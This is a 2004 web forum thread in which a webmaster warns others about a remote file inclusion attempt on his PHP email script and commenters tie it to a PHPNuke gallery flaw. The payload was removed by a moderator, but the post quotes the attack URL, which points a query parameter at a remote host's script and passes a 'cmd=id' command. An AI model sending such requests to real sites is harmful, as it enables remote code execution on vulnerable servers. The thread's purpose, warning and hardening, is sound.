Forum Moderators: coopster
www.mydomain.com/email.php?page=http://nasty-nasty-domain/hkz.txt?&cmd=id
My file "email.php" was designed to read a URL from my website (defined in var 'page') and send it to a requested email address. This hack attempts to fool my site into reading remotely the following code:
<modnote - code removed>
It's too early for me to understand exactly what this code does. Perhaps someone can shed some light on the topic?
While I'm a paranoid coder and this exploit does not work on my site (I check all 'page' variables to ensure they actually exist as a page on my site), a little research shows that other webmasters have been hit with similar hacks that have brought networks to a halt. Again, it has targeted php pages that read local files via the query string (think about all those index.php?include=mypage.php content system designs...)
Just a warning to those using QS file references. Escape variables, check that files exist on your servers, etc.
You can never be too paranoid!
[edited by: jatar_k at 2:24 am (utc) on May 24, 2004]
the information about it can be found here
Security issues in My_eGallery for PHPNuke [lottasophie.sourceforge.net]
phpnuke has had numerous problems and as mentioned in that article
I do not intend to maintain My_eGallery for PHPNuke
but it would seem that My_eGallery has been fixed.
there is also a mention here
[securityfocus.com...]
Let this serve as a reminder to always patch code, be careful of what packages you install on your server/site and always take all necessary precautions when coding.
While it affects My_eGallery, I believe it has the potential to exploit any site that reads URL's via the QS. I suspect this is why my site was targeted (I do not run My_eGallery, nor use any unofficial php applications / packages).
